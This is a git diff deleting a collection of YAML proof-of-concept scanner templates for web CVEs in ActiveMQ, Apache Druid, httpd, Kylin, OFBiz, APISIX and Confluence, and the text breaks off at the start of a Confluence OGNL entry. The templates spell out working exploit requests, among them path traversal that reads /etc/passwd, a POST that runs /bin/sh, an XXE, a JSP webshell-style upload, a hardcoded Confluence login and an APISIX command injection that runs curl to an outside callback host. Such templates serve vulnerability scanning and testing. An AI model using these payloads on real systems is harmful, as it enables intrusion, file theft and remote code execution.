--- a/tmp/cve/activemq-cve-2016-3088.yml
+++ /dev/null
@@ -1,46 +0,0 @@
-name: poc-yaml-activemq-cve-2016-3088
-manual: true
-transport: http
-set:
- filename: randomLowercase(6)
- fileContent: randomLowercase(6)
-rules:
- r0:
- request:
- cache: true
- method: PUT
- path: /fileserver/{{filename}}.txt
- body: |
- {{fileContent}}
- expression: response.status == 204
- r1:
- request:
- cache: true
- method: GET
- path: /admin/testnmanp/index.jsp
- follow_redirects: false
- expression: response.status == 200
- output:
- search: '"activemq.home=(?P.*?),".bsubmatch(response.body)'
- home: search["home"]
- r2:
- request:
- cache: true
- method: MOVE
- path: /fileserver/{{filename}}.txt
- headers:
- Destination: file://{{home}}/webapps/api/{{filename}}.jsp
- follow_redirects: false
- expression: response.status == 204
- r3:
- request:
- cache: true
- method: GET
- path: /api/{{filename}}.jsp
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
-expression: r0() && r1() && r2() && r3()
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
diff --git a/tmp/cve/apache-druid-cve-2021-36749.yaml b/tmp/cve/apache-druid-cve-2021-36749.yaml
deleted file mode 100644
index f1397b50b1..0000000000
--- a/tmp/cve/apache-druid-cve-2021-36749.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-apache-druid-cve-2021-36749
-manual: true
-transport: http
-rules:
- druid1:
- request:
- cache: true
- method: POST
- path: /druid/indexer/v1/sampler?for=connect
- headers:
- Content-Type: application/json;charset=utf-8
- body: |
- {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
- expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
- druid2:
- request:
- cache: true
- method: POST
- path: /druid/indexer/v1/sampler?for=connect
- headers:
- Content-Type: application/json;charset=utf-8
- body: |
- {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
-expression: druid1() || druid2()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
diff --git a/tmp/cve/apache-druid-cve-2021-36749.yml b/tmp/cve/apache-druid-cve-2021-36749.yml
deleted file mode 100644
index cda2e8f5a3..0000000000
--- a/tmp/cve/apache-druid-cve-2021-36749.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-apache-druid-cve-2021-36749
-manual: true
-transport: http
-rules:
- druid1:
- request:
- cache: true
- method: POST
- path: /druid/indexer/v1/sampler?for=connect
- headers:
- Content-Type: application/json;charset=utf-8
- body: |
- {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
- expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
- druid2:
- request:
- cache: true
- method: POST
- path: /druid/indexer/v1/sampler?for=connect
- headers:
- Content-Type: application/json;charset=utf-8
- body: |
- {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
-expression: druid1() || druid2()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
diff --git a/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yaml b/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yaml
deleted file mode 100644
index 826d4f9f42..0000000000
--- a/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
-expression: r0()
-detail:
- author: Jarcis-cy(https://github.com/Jarcis-cy)
- links:
- - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
diff --git a/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yml b/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yml
deleted file mode 100644
index 814d29edc0..0000000000
--- a/tmp/cve/apache-httpd-cve-2021-40438-ssrf.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
-expression: r0()
-detail:
- author: Jarcis-cy(https://github.com/Jarcis-cy)
- links:
- - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
diff --git a/tmp/cve/apache-httpd-cve-2021-41773-path-traversal.yaml b/tmp/cve/apache-httpd-cve-2021-41773-path-traversal.yaml
deleted file mode 100644
index c9bafb41e9..0000000000
--- a/tmp/cve/apache-httpd-cve-2021-41773-path-traversal.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
-manual: true
-transport: http
-rules:
- cgibin0:
- request:
- cache: true
- method: GET
- path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
- icons0:
- request:
- cache: true
- method: GET
- path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-expression: cgibin0() || icons0()
-detail:
- author: JingLing(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
diff --git a/tmp/cve/apache-httpd-cve-2021-41773-rce.yaml b/tmp/cve/apache-httpd-cve-2021-41773-rce.yaml
deleted file mode 100644
index 37b0baef9c..0000000000
--- a/tmp/cve/apache-httpd-cve-2021-41773-rce.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-41773-rce
-manual: true
-transport: http
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
- body: echo;expr {{r1}} + {{r2}}
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
diff --git a/tmp/cve/apache-kylin-unauth-cve-2020-13937.yaml b/tmp/cve/apache-kylin-unauth-cve-2020-13937.yaml
deleted file mode 100644
index c697addab7..0000000000
--- a/tmp/cve/apache-kylin-unauth-cve-2020-13937.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-apache-kylin-unauth-cve-2020-13937
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /kylin/api/admin/config
- expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
-expression: r0()
-detail:
- author: JingLing(github.com/shmilylty)
- links:
- - https://s.tencent.com/research/bsafe/1156.html
diff --git a/tmp/cve/apache-ofbiz-cve-2018-8033-xxe.yaml b/tmp/cve/apache-ofbiz-cve-2018-8033-xxe.yaml
deleted file mode 100644
index b019b598b3..0000000000
--- a/tmp/cve/apache-ofbiz-cve-2018-8033-xxe.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /webtools/control/xmlrpc
- headers:
- Content-Type: application/xml
- body: ]>&disclose;
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
-expression: r0()
-detail:
- author: su(https://suzzz112113.github.io/#blog)
- links:
- - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
diff --git a/tmp/cve/apache-ofbiz-cve-2020-9496-xml-deserialization.yaml b/tmp/cve/apache-ofbiz-cve-2020-9496-xml-deserialization.yaml
deleted file mode 100644
index c1d72138c6..0000000000
--- a/tmp/cve/apache-ofbiz-cve-2020-9496-xml-deserialization.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization
-manual: true
-transport: http
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /webtools/control/xmlrpc
- headers:
- Content-Type: application/xml
- body: {{rand}}dwisiswant0
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
-expression: r0()
-detail:
- author: su(https://suzzz112113.github.io/#blog)
- links:
- - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E
- - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
diff --git a/tmp/cve/apisix-dashboard-cve-2022-24112-rce.yml b/tmp/cve/apisix-dashboard-cve-2022-24112-rce.yml
deleted file mode 100755
index b7258371ce..0000000000
--- a/tmp/cve/apisix-dashboard-cve-2022-24112-rce.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-name: poc-yaml-apisix-dashboard-cve-2022-24112-rce
-binding: 6a3fb562-3910-48b7-b4d9-df96093bc242
-manual: true
-detail:
- author: Xz
- links:
- - https://www.openwall.com/lists/oss-security/2022/02/11/3
- - https://twitter.com/sirifu4k1/status/1496043663704858625
- - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
- - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
- vulnerability:
- id: CT-386274
- level: critical
- description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
-transport: http
-set:
- r1: randomLowercase(25)
- reverse: newReverse()
- reverseDNS: reverse.domain
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /apisix/batch-requests
- headers:
- Content-Type: application/json
- body: |
- {
- "headers":{
- "X-Real-IP":"127.0.0.1",
- "Content-Type":"application/json"
- },
- "timeout":1500,
- "pipeline":[
- {
- "method":"PUT",
- "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
- "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{r1}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{reverseDNS}}'); return true end\"}"
- }
- ]
- }
- expression: response.status == 200 && response.body.bcontains(b"\"reason\":\"OK\"") && response.body.bcontains(b"\"status\":200") && response.headers["Content-Type"].contains("text/plain")
- r1:
- request:
- cache: true
- method: GET
- path: /api/{{r1}}
- expression: reverse.wait(5)
-expression: r0() && r1()
diff --git a/tmp/cve/atlassian-confluence-dologin-dfpass-cve-2022-26138.yml b/tmp/cve/atlassian-confluence-dologin-dfpass-cve-2022-26138.yml
deleted file mode 100755
index 79dd07c4e5..0000000000
--- a/tmp/cve/atlassian-confluence-dologin-dfpass-cve-2022-26138.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-confluence-cve-2022-26138
-binding: 8cbb3704-d1b6-46ce-a5dd-6e77b3c77ff1
-manual: true
-detail:
- author: z92g(https://github.com/z92g)
- links:
- - https://github.com/alcaparra/CVE-2022-26138
- vulnerability:
- id: CT-458955
- level: critical
-transport: http
-set:
- rand: randomLowercase(10)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /dologin.action
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2F{{rand}}.action
- expression: |
- response.status == 302 && ("^" + request.url.scheme + "://" + request.url.host + "/" + rand + ".action$").matches(response.headers["Location"])
-expression: r0()
diff --git a/tmp/cve/atlassian-confluence-uri-ognl-rce-cve-2022-26134.yml b/tmp/cve/atlassian-confluence-uri-ognl-rce-cve-2022-26134.yml
deleted file mode 100755
index a5669ec313..0000000000
--- a/tmp/cve/atlassian-confluence-uri-ognl-rce-cve-2022-26134.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-confluence-cve-2022-26134-rce
